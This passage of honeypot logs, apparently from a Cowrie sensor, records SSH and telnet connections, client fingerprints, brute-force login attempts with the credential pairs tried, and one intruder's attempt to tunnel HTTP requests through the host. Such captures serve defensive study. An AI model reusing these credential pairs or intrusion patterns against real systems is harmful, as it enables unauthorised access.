{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:44:35.671277Z","src_ip":"212.227.125.160","session":"68644112ba73"}
{"eventid":"cowrie.login.failed","username":"oneadmin","password":"oneadmin","message":"login attempt [oneadmin/oneadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:44:35.827121Z","src_ip":"212.227.125.160","session":"68644112ba73"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:44:36.880396Z","src_ip":"212.227.125.160","session":"68644112ba73"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30919,"dst_ip":"1.2.3.4","dst_port":22,"session":"5262a5c7f0a2","protocol":"ssh","message":"New connection: 213.209.150.239:30919 (1.2.3.4:22) [session: 5262a5c7f0a2]","sensor":"my-vps","timestamp":"2025-08-26T01:45:14.133156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:45:14.135465Z","src_ip":"213.209.150.239","session":"5262a5c7f0a2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:45:14.191995Z","src_ip":"213.209.150.239","session":"5262a5c7f0a2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:45:14.474065Z","src_ip":"213.209.150.239","session":"5262a5c7f0a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":23407,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:23407","sensor":"my-vps","timestamp":"2025-08-26T01:45:14.531559Z","session":"5262a5c7f0a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:45:14.588406Z","src_ip":"213.209.150.239","session":"5262a5c7f0a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":14031,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:14031","sensor":"my-vps","timestamp":"2025-08-26T01:45:14.742996Z","session":"5262a5c7f0a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:45:14.799639Z","src_ip":"213.209.150.239","session":"5262a5c7f0a2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:45:14.857755Z","src_ip":"213.209.150.239","session":"5262a5c7f0a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53858,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cd101dd6c9d","protocol":"ssh","message":"New connection: 212.227.125.160:53858 (1.2.3.4:22) [session: 2cd101dd6c9d]","sensor":"my-vps","timestamp":"2025-08-26T01:47:28.856626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:47:28.857520Z","src_ip":"212.227.125.160","session":"2cd101dd6c9d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:47:28.917181Z","src_ip":"212.227.125.160","session":"2cd101dd6c9d"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol123","message":"login attempt [sol/sol123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:47:29.097823Z","src_ip":"212.227.125.160","session":"2cd101dd6c9d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:47:30.159619Z","src_ip":"212.227.125.160","session":"2cd101dd6c9d"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":33990,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab30dfbc9664","protocol":"ssh","message":"New connection: 45.88.8.186:33990 (1.2.3.4:22) [session: ab30dfbc9664]","sensor":"my-vps","timestamp":"2025-08-26T01:48:18.527127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:48:19.027193Z","src_ip":"45.88.8.186","session":"ab30dfbc9664"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T01:48:19.028398Z","src_ip":"45.88.8.186","session":"ab30dfbc9664"}
{"eventid":"cowrie.login.success","username":"root","password":"123ewq","message":"login attempt [root/123ewq] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:48:21.421601Z","src_ip":"45.88.8.186","session":"ab30dfbc9664"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:48:22.207448Z","src_ip":"45.88.8.186","session":"ab30dfbc9664"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62174,"dst_ip":"1.2.3.4","dst_port":22,"session":"02bc0265932d","protocol":"ssh","message":"New connection: 217.72.205.35:62174 (1.2.3.4:22) [session: 02bc0265932d]","sensor":"my-vps","timestamp":"2025-08-26T01:50:07.108214Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:50:07.109530Z","src_ip":"217.72.205.35","session":"02bc0265932d"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":56328,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cb51e13d2a7","protocol":"ssh","message":"New connection: 45.88.8.215:56328 (1.2.3.4:22) [session: 2cb51e13d2a7]","sensor":"my-vps","timestamp":"2025-08-26T01:51:04.850832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:51:05.466302Z","src_ip":"45.88.8.215","session":"2cb51e13d2a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T01:51:05.467191Z","src_ip":"45.88.8.215","session":"2cb51e13d2a7"}
{"eventid":"cowrie.login.success","username":"root","password":"Jayesh@123","message":"login attempt [root/Jayesh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:51:07.418780Z","src_ip":"45.88.8.215","session":"2cb51e13d2a7"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:51:07.741656Z","src_ip":"45.88.8.215","session":"2cb51e13d2a7"}
{"eventid":"cowrie.session.connect","src_ip":"222.241.134.53","src_port":35590,"dst_ip":"1.2.3.4","dst_port":23,"session":"c76bcae5dd91","protocol":"telnet","message":"New connection: 222.241.134.53:35590 (1.2.3.4:23) [session: c76bcae5dd91]","sensor":"my-vps","timestamp":"2025-08-26T01:51:16.373706Z"}
{"eventid":"cowrie.session.closed","duration":12.814457178115845,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:51:29.188132Z","src_ip":"222.241.134.53","session":"c76bcae5dd91"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38368,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b71e6d0d080","protocol":"ssh","message":"New connection: 87.120.191.13:38368 (1.2.3.4:22) [session: 7b71e6d0d080]","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.115789Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38388,"dst_ip":"1.2.3.4","dst_port":22,"session":"843c9496257b","protocol":"ssh","message":"New connection: 87.120.191.13:38388 (1.2.3.4:22) [session: 843c9496257b]","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.116749Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38408,"dst_ip":"1.2.3.4","dst_port":22,"session":"5730ae3214a8","protocol":"ssh","message":"New connection: 87.120.191.13:38408 (1.2.3.4:22) [session: 5730ae3214a8]","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.117417Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38430,"dst_ip":"1.2.3.4","dst_port":22,"session":"642d837648d1","protocol":"ssh","message":"New connection: 87.120.191.13:38430 (1.2.3.4:22) [session: 642d837648d1]","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.118623Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38398,"dst_ip":"1.2.3.4","dst_port":22,"session":"76a8bf183454","protocol":"ssh","message":"New connection: 87.120.191.13:38398 (1.2.3.4:22) [session: 76a8bf183454]","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.119375Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38424,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec952d8099ac","protocol":"ssh","message":"New connection: 87.120.191.13:38424 (1.2.3.4:22) [session: ec952d8099ac]","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.120522Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38360,"dst_ip":"1.2.3.4","dst_port":22,"session":"b366d603f02e","protocol":"ssh","message":"New connection: 87.120.191.13:38360 (1.2.3.4:22) [session: b366d603f02e]","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.121221Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38372,"dst_ip":"1.2.3.4","dst_port":22,"session":"c52a9fbc1ccf","protocol":"ssh","message":"New connection: 87.120.191.13:38372 (1.2.3.4:22) [session: c52a9fbc1ccf]","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.122100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.164061Z","src_ip":"87.120.191.13","session":"7b71e6d0d080"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.164773Z","src_ip":"87.120.191.13","session":"843c9496257b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.165288Z","src_ip":"87.120.191.13","session":"5730ae3214a8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.165851Z","src_ip":"87.120.191.13","session":"642d837648d1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.166489Z","src_ip":"87.120.191.13","session":"76a8bf183454"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.167255Z","src_ip":"87.120.191.13","session":"ec952d8099ac"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.167694Z","src_ip":"87.120.191.13","session":"b366d603f02e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.168209Z","src_ip":"87.120.191.13","session":"c52a9fbc1ccf"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.209808Z","src_ip":"87.120.191.13","session":"b366d603f02e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.211633Z","src_ip":"87.120.191.13","session":"ec952d8099ac"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.214484Z","src_ip":"87.120.191.13","session":"7b71e6d0d080"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[